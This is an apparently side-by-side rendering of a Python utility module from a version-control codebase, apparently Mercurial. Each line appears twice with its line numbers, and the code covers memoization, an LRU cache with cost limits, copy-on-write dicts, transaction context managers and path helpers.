1240 if func.__code__.co_argcount == 1:
1241 # we gain a small amount of time because
1241 # we gain a small amount of time because
1242 # we don't need to pack/unpack the list
1242 # we don't need to pack/unpack the list
1243 def f(arg):
1243 def f(arg):
1244 if arg not in cache:
1244 if arg not in cache:
1245 cache[arg] = func(arg)
1245 cache[arg] = func(arg)
1246 return cache[arg]
1246 return cache[arg]
1247
1247
1248 else:
1248 else:
1249
1249
1250 def f(*args):
1250 def f(*args):
1251 if args not in cache:
1251 if args not in cache:
1252 cache[args] = func(*args)
1252 cache[args] = func(*args)
1253 return cache[args]
1253 return cache[args]
1254
1254
1255 return f
1255 return f
1256
1256
1257
1257
1258 class cow(object):
1258 class cow(object):
1259 """helper class to make copy-on-write easier
1259 """helper class to make copy-on-write easier
1260
1260
1261 Call preparewrite before doing any writes.
1261 Call preparewrite before doing any writes.
1262 """
1262 """
1263
1263
1264 def preparewrite(self):
1264 def preparewrite(self):
1265 """call this before writes, return self or a copied new object"""
1265 """call this before writes, return self or a copied new object"""
1266 if getattr(self, '_copied', 0):
1266 if getattr(self, '_copied', 0):
1267 self._copied -= 1
1267 self._copied -= 1
1268 return self.__class__(self)
1268 return self.__class__(self)
1269 return self
1269 return self
1270
1270
1271 def copy(self):
1271 def copy(self):
1272 """always do a cheap copy"""
1272 """always do a cheap copy"""
1273 self._copied = getattr(self, '_copied', 0) + 1
1273 self._copied = getattr(self, '_copied', 0) + 1
1274 return self
1274 return self
1275
1275
1276
1276
1277 class sortdict(collections.OrderedDict):
1277 class sortdict(collections.OrderedDict):
1278 """a simple sorted dictionary
1278 """a simple sorted dictionary
1279
1279
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 >>> d2 = d1.copy()
1281 >>> d2 = d1.copy()
1282 >>> d2
1282 >>> d2
1283 sortdict([('a', 0), ('b', 1)])
1283 sortdict([('a', 0), ('b', 1)])
1284 >>> d2.update([(b'a', 2)])
1284 >>> d2.update([(b'a', 2)])
1285 >>> list(d2.keys()) # should still be in last-set order
1285 >>> list(d2.keys()) # should still be in last-set order
1286 ['b', 'a']
1286 ['b', 'a']
1287 >>> d1.insert(1, b'a.5', 0.5)
1287 >>> d1.insert(1, b'a.5', 0.5)
1288 >>> d1
1288 >>> d1
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 """
1290 """
1291
1291
1292 def __setitem__(self, key, value):
1292 def __setitem__(self, key, value):
1293 if key in self:
1293 if key in self:
1294 del self[key]
1294 del self[key]
1295 super(sortdict, self).__setitem__(key, value)
1295 super(sortdict, self).__setitem__(key, value)
1296
1296
1297 if pycompat.ispypy:
1297 if pycompat.ispypy:
1298 # __setitem__() isn't called as of PyPy 5.8.0
1298 # __setitem__() isn't called as of PyPy 5.8.0
1299 def update(self, src):
1299 def update(self, src):
1300 if isinstance(src, dict):
1300 if isinstance(src, dict):
1301 src = pycompat.iteritems(src)
1301 src = pycompat.iteritems(src)
1302 for k, v in src:
1302 for k, v in src:
1303 self[k] = v
1303 self[k] = v
1304
1304
1305 def insert(self, position, key, value):
1305 def insert(self, position, key, value):
1306 for (i, (k, v)) in enumerate(list(self.items())):
1306 for (i, (k, v)) in enumerate(list(self.items())):
1307 if i == position:
1307 if i == position:
1308 self[key] = value
1308 self[key] = value
1309 if i >= position:
1309 if i >= position:
1310 del self[k]
1310 del self[k]
1311 self[k] = v
1311 self[k] = v
1312
1312
1313
1313
1314 class cowdict(cow, dict):
1314 class cowdict(cow, dict):
1315 """copy-on-write dict
1315 """copy-on-write dict
1316
1316
1317 Be sure to call d = d.preparewrite() before writing to d.
1317 Be sure to call d = d.preparewrite() before writing to d.
1318
1318
1319 >>> a = cowdict()
1319 >>> a = cowdict()
1320 >>> a is a.preparewrite()
1320 >>> a is a.preparewrite()
1321 True
1321 True
1322 >>> b = a.copy()
1322 >>> b = a.copy()
1323 >>> b is a
1323 >>> b is a
1324 True
1324 True
1325 >>> c = b.copy()
1325 >>> c = b.copy()
1326 >>> c is a
1326 >>> c is a
1327 True
1327 True
1328 >>> a = a.preparewrite()
1328 >>> a = a.preparewrite()
1329 >>> b is a
1329 >>> b is a
1330 False
1330 False
1331 >>> a is a.preparewrite()
1331 >>> a is a.preparewrite()
1332 True
1332 True
1333 >>> c = c.preparewrite()
1333 >>> c = c.preparewrite()
1334 >>> b is c
1334 >>> b is c
1335 False
1335 False
1336 >>> b is b.preparewrite()
1336 >>> b is b.preparewrite()
1337 True
1337 True
1338 """
1338 """
1339
1339
1340
1340
1341 class cowsortdict(cow, sortdict):
1341 class cowsortdict(cow, sortdict):
1342 """copy-on-write sortdict
1342 """copy-on-write sortdict
1343
1343
1344 Be sure to call d = d.preparewrite() before writing to d.
1344 Be sure to call d = d.preparewrite() before writing to d.
1345 """
1345 """
1346
1346
1347
1347
1348 class transactional(object): # pytype: disable=ignored-metaclass
1348 class transactional(object): # pytype: disable=ignored-metaclass
1349 """Base class for making a transactional type into a context manager."""
1349 """Base class for making a transactional type into a context manager."""
1350
1350
1351 __metaclass__ = abc.ABCMeta
1351 __metaclass__ = abc.ABCMeta
1352
1352
1353 @abc.abstractmethod
1353 @abc.abstractmethod
1354 def close(self):
1354 def close(self):
1355 """Successfully closes the transaction."""
1355 """Successfully closes the transaction."""
1356
1356
1357 @abc.abstractmethod
1357 @abc.abstractmethod
1358 def release(self):
1358 def release(self):
1359 """Marks the end of the transaction.
1359 """Marks the end of the transaction.
1360
1360
1361 If the transaction has not been closed, it will be aborted.
1361 If the transaction has not been closed, it will be aborted.
1362 """
1362 """
1363
1363
1364 def __enter__(self):
1364 def __enter__(self):
1365 return self
1365 return self
1366
1366
1367 def __exit__(self, exc_type, exc_val, exc_tb):
1367 def __exit__(self, exc_type, exc_val, exc_tb):
1368 try:
1368 try:
1369 if exc_type is None:
1369 if exc_type is None:
1370 self.close()
1370 self.close()
1371 finally:
1371 finally:
1372 self.release()
1372 self.release()
1373
1373
1374
1374
1375 @contextlib.contextmanager
1375 @contextlib.contextmanager
1376 def acceptintervention(tr=None):
1376 def acceptintervention(tr=None):
1377 """A context manager that closes the transaction on InterventionRequired
1377 """A context manager that closes the transaction on InterventionRequired
1378
1378
1379 If no transaction was provided, this simply runs the body and returns
1379 If no transaction was provided, this simply runs the body and returns
1380 """
1380 """
1381 if not tr:
1381 if not tr:
1382 yield
1382 yield
1383 return
1383 return
1384 try:
1384 try:
1385 yield
1385 yield
1386 tr.close()
1386 tr.close()
1387 except error.InterventionRequired:
1387 except error.InterventionRequired:
1388 tr.close()
1388 tr.close()
1389 raise
1389 raise
1390 finally:
1390 finally:
1391 tr.release()
1391 tr.release()
1392
1392
1393
1393
1394 @contextlib.contextmanager
1394 @contextlib.contextmanager
1395 def nullcontextmanager(enter_result=None):
1395 def nullcontextmanager(enter_result=None):
1396 yield enter_result
1396 yield enter_result
1397
1397
1398
1398
1399 class _lrucachenode(object):
1399 class _lrucachenode(object):
1400 """A node in a doubly linked list.
1400 """A node in a doubly linked list.
1401
1401
1402 Holds a reference to nodes on either side as well as a key-value
1402 Holds a reference to nodes on either side as well as a key-value
1403 pair for the dictionary entry.
1403 pair for the dictionary entry.
1404 """
1404 """
1405
1405
1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1407
1407
1408 def __init__(self):
1408 def __init__(self):
1409 self.next = None
1409 self.next = None
1410 self.prev = None
1410 self.prev = None
1411
1411
1412 self.key = _notset
1412 self.key = _notset
1413 self.value = None
1413 self.value = None
1414 self.cost = 0
1414 self.cost = 0
1415
1415
1416 def markempty(self):
1416 def markempty(self):
1417 """Mark the node as emptied."""
1417 """Mark the node as emptied."""
1418 self.key = _notset
1418 self.key = _notset
1419 self.value = None
1419 self.value = None
1420 self.cost = 0
1420 self.cost = 0
1421
1421
1422
1422
1423 class lrucachedict(object):
1423 class lrucachedict(object):
1424 """Dict that caches most recent accesses and sets.
1424 """Dict that caches most recent accesses and sets.
1425
1425
1426 The dict consists of an actual backing dict - indexed by original
1426 The dict consists of an actual backing dict - indexed by original
1427 key - and a doubly linked circular list defining the order of entries in
1427 key - and a doubly linked circular list defining the order of entries in
1428 the cache.
1428 the cache.
1429
1429
1430 The head node is the newest entry in the cache. If the cache is full,
1430 The head node is the newest entry in the cache. If the cache is full,
1431 we recycle head.prev and make it the new head. Cache accesses result in
1431 we recycle head.prev and make it the new head. Cache accesses result in
1432 the node being moved to before the existing head and being marked as the
1432 the node being moved to before the existing head and being marked as the
1433 new head node.
1433 new head node.
1434
1434
1435 Items in the cache can be inserted with an optional "cost" value. This is
1435 Items in the cache can be inserted with an optional "cost" value. This is
1436 simply an integer that is specified by the caller. The cache can be queried
1436 simply an integer that is specified by the caller. The cache can be queried
1437 for the total cost of all items presently in the cache.
1437 for the total cost of all items presently in the cache.
1438
1438
1439 The cache can also define a maximum cost. If a cache insertion would
1439 The cache can also define a maximum cost. If a cache insertion would
1440 cause the total cost of the cache to go beyond the maximum cost limit,
1440 cause the total cost of the cache to go beyond the maximum cost limit,
1441 nodes will be evicted to make room for the new code. This can be used
1441 nodes will be evicted to make room for the new code. This can be used
1442 to e.g. set a max memory limit and associate an estimated bytes size
1442 to e.g. set a max memory limit and associate an estimated bytes size
1443 cost to each item in the cache. By default, no maximum cost is enforced.
1443 cost to each item in the cache. By default, no maximum cost is enforced.
1444 """
1444 """
1445
1445
1446 def __init__(self, max, maxcost=0):
1446 def __init__(self, max, maxcost=0):
1447 self._cache = {}
1447 self._cache = {}
1448
1448
1449 self._head = head = _lrucachenode()
1449 self._head = head = _lrucachenode()
1450 head.prev = head
1450 head.prev = head
1451 head.next = head
1451 head.next = head
1452 self._size = 1
1452 self._size = 1
1453 self.capacity = max
1453 self.capacity = max
1454 self.totalcost = 0
1454 self.totalcost = 0
1455 self.maxcost = maxcost
1455 self.maxcost = maxcost
1456
1456
1457 def __len__(self):
1457 def __len__(self):
1458 return len(self._cache)
1458 return len(self._cache)
1459
1459
1460 def __contains__(self, k):
1460 def __contains__(self, k):
1461 return k in self._cache
1461 return k in self._cache
1462
1462
1463 def __iter__(self):
1463 def __iter__(self):
1464 # We don't have to iterate in cache order, but why not.
1464 # We don't have to iterate in cache order, but why not.
1465 n = self._head
1465 n = self._head
1466 for i in range(len(self._cache)):
1466 for i in range(len(self._cache)):
1467 yield n.key
1467 yield n.key
1468 n = n.next
1468 n = n.next
1469
1469
1470 def __getitem__(self, k):
1470 def __getitem__(self, k):
1471 node = self._cache[k]
1471 node = self._cache[k]
1472 self._movetohead(node)
1472 self._movetohead(node)
1473 return node.value
1473 return node.value
1474
1474
1475 def insert(self, k, v, cost=0):
1475 def insert(self, k, v, cost=0):
1476 """Insert a new item in the cache with optional cost value."""
1476 """Insert a new item in the cache with optional cost value."""
1477 node = self._cache.get(k)
1477 node = self._cache.get(k)
1478 # Replace existing value and mark as newest.
1478 # Replace existing value and mark as newest.
1479 if node is not None:
1479 if node is not None:
1480 self.totalcost -= node.cost
1480 self.totalcost -= node.cost
1481 node.value = v
1481 node.value = v
1482 node.cost = cost
1482 node.cost = cost
1483 self.totalcost += cost
1483 self.totalcost += cost
1484 self._movetohead(node)
1484 self._movetohead(node)
1485
1485
1486 if self.maxcost:
1486 if self.maxcost:
1487 self._enforcecostlimit()
1487 self._enforcecostlimit()
1488
1488
1489 return
1489 return
1490
1490
1491 if self._size < self.capacity:
1491 if self._size < self.capacity:
1492 node = self._addcapacity()
1492 node = self._addcapacity()
1493 else:
1493 else:
1494 # Grab the last/oldest item.
1494 # Grab the last/oldest item.
1495 node = self._head.prev
1495 node = self._head.prev
1496
1496
1497 # At capacity. Kill the old entry.
1497 # At capacity. Kill the old entry.
1498 if node.key is not _notset:
1498 if node.key is not _notset:
1499 self.totalcost -= node.cost
1499 self.totalcost -= node.cost
1500 del self._cache[node.key]
1500 del self._cache[node.key]
1501
1501
1502 node.key = k
1502 node.key = k
1503 node.value = v
1503 node.value = v
1504 node.cost = cost
1504 node.cost = cost
1505 self.totalcost += cost
1505 self.totalcost += cost
1506 self._cache[k] = node
1506 self._cache[k] = node
1507 # And mark it as newest entry. No need to adjust order since it
1507 # And mark it as newest entry. No need to adjust order since it
1508 # is already self._head.prev.
1508 # is already self._head.prev.
1509 self._head = node
1509 self._head = node
1510
1510
1511 if self.maxcost:
1511 if self.maxcost:
1512 self._enforcecostlimit()
1512 self._enforcecostlimit()
1513
1513
1514 def __setitem__(self, k, v):
1514 def __setitem__(self, k, v):
1515 self.insert(k, v)
1515 self.insert(k, v)
1516
1516
1517 def __delitem__(self, k):
1517 def __delitem__(self, k):
1518 self.pop(k)
1518 self.pop(k)
1519
1519
1520 def pop(self, k, default=_notset):
1520 def pop(self, k, default=_notset):
1521 try:
1521 try:
1522 node = self._cache.pop(k)
1522 node = self._cache.pop(k)
1523 except KeyError:
1523 except KeyError:
1524 if default is _notset:
1524 if default is _notset:
1525 raise
1525 raise
1526 return default
1526 return default
1527
1527
1528 assert node is not None # help pytype
1528 assert node is not None # help pytype
1529 value = node.value
1529 value = node.value
1530 self.totalcost -= node.cost
1530 self.totalcost -= node.cost
1531 node.markempty()
1531 node.markempty()
1532
1532
1533 # Temporarily mark as newest item before re-adjusting head to make
1533 # Temporarily mark as newest item before re-adjusting head to make
1534 # this node the oldest item.
1534 # this node the oldest item.
1535 self._movetohead(node)
1535 self._movetohead(node)
1536 self._head = node.next
1536 self._head = node.next
1537
1537
1538 return value
1538 return value
1539
1539
1540 # Additional dict methods.
1540 # Additional dict methods.
1541
1541
1542 def get(self, k, default=None):
1542 def get(self, k, default=None):
1543 try:
1543 try:
1544 return self.__getitem__(k)
1544 return self.__getitem__(k)
1545 except KeyError:
1545 except KeyError:
1546 return default
1546 return default
1547
1547
1548 def peek(self, k, default=_notset):
1548 def peek(self, k, default=_notset):
1549 """Get the specified item without moving it to the head
1549 """Get the specified item without moving it to the head
1550
1550
1551 Unlike get(), this doesn't mutate the internal state. But be aware
1551 Unlike get(), this doesn't mutate the internal state. But be aware
1552 that it doesn't mean peek() is thread safe.
1552 that it doesn't mean peek() is thread safe.
1553 """
1553 """
1554 try:
1554 try:
1555 node = self._cache[k]
1555 node = self._cache[k]
1556 return node.value
1556 return node.value
1557 except KeyError:
1557 except KeyError:
1558 if default is _notset:
1558 if default is _notset:
1559 raise
1559 raise
1560 return default
1560 return default
1561
1561
1562 def clear(self):
1562 def clear(self):
1563 n = self._head
1563 n = self._head
1564 while n.key is not _notset:
1564 while n.key is not _notset:
1565 self.totalcost -= n.cost
1565 self.totalcost -= n.cost
1566 n.markempty()
1566 n.markempty()
1567 n = n.next
1567 n = n.next
1568
1568
1569 self._cache.clear()
1569 self._cache.clear()
1570
1570
1571 def copy(self, capacity=None, maxcost=0):
1571 def copy(self, capacity=None, maxcost=0):
1572 """Create a new cache as a copy of the current one.
1572 """Create a new cache as a copy of the current one.
1573
1573
1574 By default, the new cache has the same capacity as the existing one.
1574 By default, the new cache has the same capacity as the existing one.
1575 But, the cache capacity can be changed as part of performing the
1575 But, the cache capacity can be changed as part of performing the
1576 copy.
1576 copy.
1577
1577
1578 Items in the copy have an insertion/access order matching this
1578 Items in the copy have an insertion/access order matching this
1579 instance.
1579 instance.
1580 """
1580 """
1581
1581
1582 capacity = capacity or self.capacity
1582 capacity = capacity or self.capacity
1583 maxcost = maxcost or self.maxcost
1583 maxcost = maxcost or self.maxcost
1584 result = lrucachedict(capacity, maxcost=maxcost)
1584 result = lrucachedict(capacity, maxcost=maxcost)
1585
1585
1586 # We copy entries by iterating in oldest-to-newest order so the copy
1586 # We copy entries by iterating in oldest-to-newest order so the copy
1587 # has the correct ordering.
1587 # has the correct ordering.
1588
1588
1589 # Find the first non-empty entry.
1589 # Find the first non-empty entry.
1590 n = self._head.prev
1590 n = self._head.prev
1591 while n.key is _notset and n is not self._head:
1591 while n.key is _notset and n is not self._head:
1592 n = n.prev
1592 n = n.prev
1593
1593
1594 # We could potentially skip the first N items when decreasing capacity.
1594 # We could potentially skip the first N items when decreasing capacity.
1595 # But let's keep it simple unless it is a performance problem.
1595 # But let's keep it simple unless it is a performance problem.
1596 for i in range(len(self._cache)):
1596 for i in range(len(self._cache)):
1597 result.insert(n.key, n.value, cost=n.cost)
1597 result.insert(n.key, n.value, cost=n.cost)
1598 n = n.prev
1598 n = n.prev
1599
1599
1600 return result
1600 return result
1601
1601
1602 def popoldest(self):
1602 def popoldest(self):
1603 """Remove the oldest item from the cache.
1603 """Remove the oldest item from the cache.
1604
1604
1605 Returns the (key, value) describing the removed cache entry.
1605 Returns the (key, value) describing the removed cache entry.
1606 """
1606 """
1607 if not self._cache:
1607 if not self._cache:
1608 return
1608 return
1609
1609
1610 # Walk the linked list backwards starting at tail node until we hit
1610 # Walk the linked list backwards starting at tail node until we hit
1611 # a non-empty node.
1611 # a non-empty node.
1612 n = self._head.prev
1612 n = self._head.prev
1613 while n.key is _notset:
1613 while n.key is _notset:
1614 n = n.prev
1614 n = n.prev
1615
1615
1616 assert n is not None # help pytype
1616 assert n is not None # help pytype
1617
1617
1618 key, value = n.key, n.value
1618 key, value = n.key, n.value
1619
1619
1620 # And remove it from the cache and mark it as empty.
1620 # And remove it from the cache and mark it as empty.
1621 del self._cache[n.key]
1621 del self._cache[n.key]
1622 self.totalcost -= n.cost
1622 self.totalcost -= n.cost
1623 n.markempty()
1623 n.markempty()
1624
1624
1625 return key, value
1625 return key, value
1626
1626
1627 def _movetohead(self, node):
1627 def _movetohead(self, node):
1628 """Mark a node as the newest, making it the new head.
1628 """Mark a node as the newest, making it the new head.
1629
1629
1630 When a node is accessed, it becomes the freshest entry in the LRU
1630 When a node is accessed, it becomes the freshest entry in the LRU
1631 list, which is denoted by self._head.
1631 list, which is denoted by self._head.
1632
1632
1633 Visually, let's make ``N`` the new head node (* denotes head):
1633 Visually, let's make ``N`` the new head node (* denotes head):
1634
1634
1635 previous/oldest <-> head <-> next/next newest
1635 previous/oldest <-> head <-> next/next newest
1636
1636
1637 ----<->--- A* ---<->-----
1637 ----<->--- A* ---<->-----
1638 | |
1638 | |
1639 E <-> D <-> N <-> C <-> B
1639 E <-> D <-> N <-> C <-> B
1640
1640
1641 To:
1641 To:
1642
1642
1643 ----<->--- N* ---<->-----
1643 ----<->--- N* ---<->-----
1644 | |
1644 | |
1645 E <-> D <-> C <-> B <-> A
1645 E <-> D <-> C <-> B <-> A
1646
1646
1647 This requires the following moves:
1647 This requires the following moves:
1648
1648
1649 C.next = D (node.prev.next = node.next)
1649 C.next = D (node.prev.next = node.next)
1650 D.prev = C (node.next.prev = node.prev)
1650 D.prev = C (node.next.prev = node.prev)
1651 E.next = N (head.prev.next = node)
1651 E.next = N (head.prev.next = node)
1652 N.prev = E (node.prev = head.prev)
1652 N.prev = E (node.prev = head.prev)
1653 N.next = A (node.next = head)
1653 N.next = A (node.next = head)
1654 A.prev = N (head.prev = node)
1654 A.prev = N (head.prev = node)
1655 """
1655 """
1656 head = self._head
1656 head = self._head
1657 # C.next = D
1657 # C.next = D
1658 node.prev.next = node.next
1658 node.prev.next = node.next
1659 # D.prev = C
1659 # D.prev = C
1660 node.next.prev = node.prev
1660 node.next.prev = node.prev
1661 # N.prev = E
1661 # N.prev = E
1662 node.prev = head.prev
1662 node.prev = head.prev
1663 # N.next = A
1663 # N.next = A
1664 # It is tempting to do just "head" here, however if node is
1664 # It is tempting to do just "head" here, however if node is
1665 # adjacent to head, this will do bad things.
1665 # adjacent to head, this will do bad things.
1666 node.next = head.prev.next
1666 node.next = head.prev.next
1667 # E.next = N
1667 # E.next = N
1668 node.next.prev = node
1668 node.next.prev = node
1669 # A.prev = N
1669 # A.prev = N
1670 node.prev.next = node
1670 node.prev.next = node
1671
1671
1672 self._head = node
1672 self._head = node
1673
1673
1674 def _addcapacity(self):
1674 def _addcapacity(self):
1675 """Add a node to the circular linked list.
1675 """Add a node to the circular linked list.
1676
1676
1677 The new node is inserted before the head node.
1677 The new node is inserted before the head node.
1678 """
1678 """
1679 head = self._head
1679 head = self._head
1680 node = _lrucachenode()
1680 node = _lrucachenode()
1681 head.prev.next = node
1681 head.prev.next = node
1682 node.prev = head.prev
1682 node.prev = head.prev
1683 node.next = head
1683 node.next = head
1684 head.prev = node
1684 head.prev = node
1685 self._size += 1
1685 self._size += 1
1686 return node
1686 return node
1687
1687
1688 def _enforcecostlimit(self):
1688 def _enforcecostlimit(self):
1689 # This should run after an insertion. It should only be called if total
1689 # This should run after an insertion. It should only be called if total
1690 # cost limits are being enforced.
1690 # cost limits are being enforced.
1691 # The most recently inserted node is never evicted.
1691 # The most recently inserted node is never evicted.
1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1693 return
1693 return
1694
1694
1695 # This is logically equivalent to calling popoldest() until we
1695 # This is logically equivalent to calling popoldest() until we
1696 # free up enough cost. We don't do that since popoldest() needs
1696 # free up enough cost. We don't do that since popoldest() needs
1697 # to walk the linked list and doing this in a loop would be
1697 # to walk the linked list and doing this in a loop would be
1698 # quadratic. So we find the first non-empty node and then
1698 # quadratic. So we find the first non-empty node and then
1699 # walk nodes until we free up enough capacity.
1699 # walk nodes until we free up enough capacity.
1700 #
1700 #
1701 # If we only removed the minimum number of nodes to free enough
1701 # If we only removed the minimum number of nodes to free enough
1702 # cost at insert time, chances are high that the next insert would
1702 # cost at insert time, chances are high that the next insert would
1703 # also require pruning. This would effectively constitute quadratic
1703 # also require pruning. This would effectively constitute quadratic
1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1705 # target cost that is a percentage of the max cost. This will tend
1705 # target cost that is a percentage of the max cost. This will tend
1706 # to free more nodes when the high water mark is reached, which
1706 # to free more nodes when the high water mark is reached, which
1707 # lowers the chances of needing to prune on the subsequent insert.
1707 # lowers the chances of needing to prune on the subsequent insert.
1708 targetcost = int(self.maxcost * 0.75)
1708 targetcost = int(self.maxcost * 0.75)
1709
1709
1710 n = self._head.prev
1710 n = self._head.prev
1711 while n.key is _notset:
1711 while n.key is _notset:
1712 n = n.prev
1712 n = n.prev
1713
1713
1714 while len(self) > 1 and self.totalcost > targetcost:
1714 while len(self) > 1 and self.totalcost > targetcost:
1715 del self._cache[n.key]
1715 del self._cache[n.key]
1716 self.totalcost -= n.cost
1716 self.totalcost -= n.cost
1717 n.markempty()
1717 n.markempty()
1718 n = n.prev
1718 n = n.prev
1719
1719
1720
1720
1721 def lrucachefunc(func):
1721 def lrucachefunc(func):
1722 '''cache most recent results of function calls'''
1722 '''cache most recent results of function calls'''
1723 cache = {}
1723 cache = {}
1724 order = collections.deque()
1724 order = collections.deque()
1725 if func.__code__.co_argcount == 1:
1725 if func.__code__.co_argcount == 1:
1726
1726
1727 def f(arg):
1727 def f(arg):
1728 if arg not in cache:
1728 if arg not in cache:
1729 if len(cache) > 20:
1729 if len(cache) > 20:
1730 del cache[order.popleft()]
1730 del cache[order.popleft()]
1731 cache[arg] = func(arg)
1731 cache[arg] = func(arg)
1732 else:
1732 else:
1733 order.remove(arg)
1733 order.remove(arg)
1734 order.append(arg)
1734 order.append(arg)
1735 return cache[arg]
1735 return cache[arg]
1736
1736
1737 else:
1737 else:
1738
1738
1739 def f(*args):
1739 def f(*args):
1740 if args not in cache:
1740 if args not in cache:
1741 if len(cache) > 20:
1741 if len(cache) > 20:
1742 del cache[order.popleft()]
1742 del cache[order.popleft()]
1743 cache[args] = func(*args)
1743 cache[args] = func(*args)
1744 else:
1744 else:
1745 order.remove(args)
1745 order.remove(args)
1746 order.append(args)
1746 order.append(args)
1747 return cache[args]
1747 return cache[args]
1748
1748
1749 return f
1749 return f
1750
1750
1751
1751
1752 class propertycache(object):
1752 class propertycache(object):
1753 def __init__(self, func):
1753 def __init__(self, func):
1754 self.func = func
1754 self.func = func
1755 self.name = func.__name__
1755 self.name = func.__name__
1756
1756
1757 def __get__(self, obj, type=None):
1757 def __get__(self, obj, type=None):
1758 result = self.func(obj)
1758 result = self.func(obj)
1759 self.cachevalue(obj, result)
1759 self.cachevalue(obj, result)
1760 return result
1760 return result
1761
1761
1762 def cachevalue(self, obj, value):
1762 def cachevalue(self, obj, value):
1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1764 obj.__dict__[self.name] = value
1764 obj.__dict__[self.name] = value
1765
1765
1766
1766
1767 def clearcachedproperty(obj, prop):
1767 def clearcachedproperty(obj, prop):
1768 '''clear a cached property value, if one has been set'''
1768 '''clear a cached property value, if one has been set'''
1769 prop = pycompat.sysstr(prop)
1769 prop = pycompat.sysstr(prop)
1770 if prop in obj.__dict__:
1770 if prop in obj.__dict__:
1771 del obj.__dict__[prop]
1771 del obj.__dict__[prop]
1772
1772
1773
1773
1774 def increasingchunks(source, min=1024, max=65536):
1774 def increasingchunks(source, min=1024, max=65536):
1775 """return no less than min bytes per chunk while data remains,
1775 """return no less than min bytes per chunk while data remains,
1776 doubling min after each chunk until it reaches max"""
1776 doubling min after each chunk until it reaches max"""
1777
1777
1778 def log2(x):
1778 def log2(x):
1779 if not x:
1779 if not x:
1780 return 0
1780 return 0
1781 i = 0
1781 i = 0
1782 while x:
1782 while x:
1783 x >>= 1
1783 x >>= 1
1784 i += 1
1784 i += 1
1785 return i - 1
1785 return i - 1
1786
1786
1787 buf = []
1787 buf = []
1788 blen = 0
1788 blen = 0
1789 for chunk in source:
1789 for chunk in source:
1790 buf.append(chunk)
1790 buf.append(chunk)
1791 blen += len(chunk)
1791 blen += len(chunk)
1792 if blen >= min:
1792 if blen >= min:
1793 if min < max:
1793 if min < max:
1794 min = min << 1
1794 min = min << 1
1795 nmin = 1 << log2(blen)
1795 nmin = 1 << log2(blen)
1796 if nmin > min:
1796 if nmin > min:
1797 min = nmin
1797 min = nmin
1798 if min > max:
1798 if min > max:
1799 min = max
1799 min = max
1800 yield b''.join(buf)
1800 yield b''.join(buf)
1801 blen = 0
1801 blen = 0
1802 buf = []
1802 buf = []
1803 if buf:
1803 if buf:
1804 yield b''.join(buf)
1804 yield b''.join(buf)
1805
1805
1806
1806
1807 def always(fn):
1807 def always(fn):
1808 return True
1808 return True
1809
1809
1810
1810
1811 def never(fn):
1811 def never(fn):
1812 return False
1812 return False
1813
1813
1814
1814
1815 def nogc(func):
1815 def nogc(func):
1816 """disable garbage collector
1816 """disable garbage collector
1817
1817
1818 Python's garbage collector triggers a GC each time a certain number of
1818 Python's garbage collector triggers a GC each time a certain number of
1819 container objects (the number being defined by gc.get_threshold()) are
1819 container objects (the number being defined by gc.get_threshold()) are
1820 allocated even when marked not to be tracked by the collector. Tracking has
1820 allocated even when marked not to be tracked by the collector. Tracking has
1821 no effect on when GCs are triggered, only on what objects the GC looks
1821 no effect on when GCs are triggered, only on what objects the GC looks
1822 into. As a workaround, disable GC while building complex (huge)
1822 into. As a workaround, disable GC while building complex (huge)
1823 containers.
1823 containers.
1824
1824
1825 This garbage collector issue have been fixed in 2.7. But it still affect
1825 This garbage collector issue have been fixed in 2.7. But it still affect
1826 CPython's performance.
1826 CPython's performance.
1827 """
1827 """
1828
1828
1829 def wrapper(*args, **kwargs):
1829 def wrapper(*args, **kwargs):
1830 gcenabled = gc.isenabled()
1830 gcenabled = gc.isenabled()
1831 gc.disable()
1831 gc.disable()
1832 try:
1832 try:
1833 return func(*args, **kwargs)
1833 return func(*args, **kwargs)
1834 finally:
1834 finally:
1835 if gcenabled:
1835 if gcenabled:
1836 gc.enable()
1836 gc.enable()
1837
1837
1838 return wrapper
1838 return wrapper
1839
1839
1840
1840
1841 if pycompat.ispypy:
1841 if pycompat.ispypy:
1842 # PyPy runs slower with gc disabled
1842 # PyPy runs slower with gc disabled
1843 nogc = lambda x: x
1843 nogc = lambda x: x
1844
1844
1845
1845
1846 def pathto(root, n1, n2):
1846 def pathto(root, n1, n2):
1847 # type: (bytes, bytes, bytes) -> bytes
1847 # type: (bytes, bytes, bytes) -> bytes
1848 """return the relative path from one place to another.
1848 """return the relative path from one place to another.
1849 root should use os.sep to separate directories
1849 root should use os.sep to separate directories
1850 n1 should use os.sep to separate directories
1850 n1 should use os.sep to separate directories
1851 n2 should use "/" to separate directories
1851 n2 should use "/" to separate directories
1852 returns an os.sep-separated path.
1852 returns an os.sep-separated path.
1853
1853
1854 If n1 is a relative path, it's assumed it's
1854 If n1 is a relative path, it's assumed it's
1855 relative to root.
1855 relative to root.
1856 n2 should always be relative to root.
1856 n2 should always be relative to root.
1857 """
1857 """
1858 if not n1:
1858 if not n1:
1859 return localpath(n2)
1859 return localpath(n2)
1860 if os.path.isabs(n1):
1860 if os.path.isabs(n1):
1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1862 return os.path.join(root, localpath(n2))
1862 return os.path.join(root, localpath(n2))
1863 n2 = b'/'.join((pconvert(root), n2))
1863 n2 = b'/'.join((pconvert(root), n2))
1864 a, b = splitpath(n1), n2.split(b'/')
1864 a, b = splitpath(n1), n2.split(b'/')
1865 a.reverse()
1865 a.reverse()
1866 b.reverse()
1866 b.reverse()
1867 while a and b and a[-1] == b[-1]:
1867 while a and b and a[-1] == b[-1]:
1868 a.pop()
1868 a.pop()
1869 b.pop()
1869 b.pop()
1870 b.reverse()
1870 b.reverse()
1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1872
1872
1873
1873
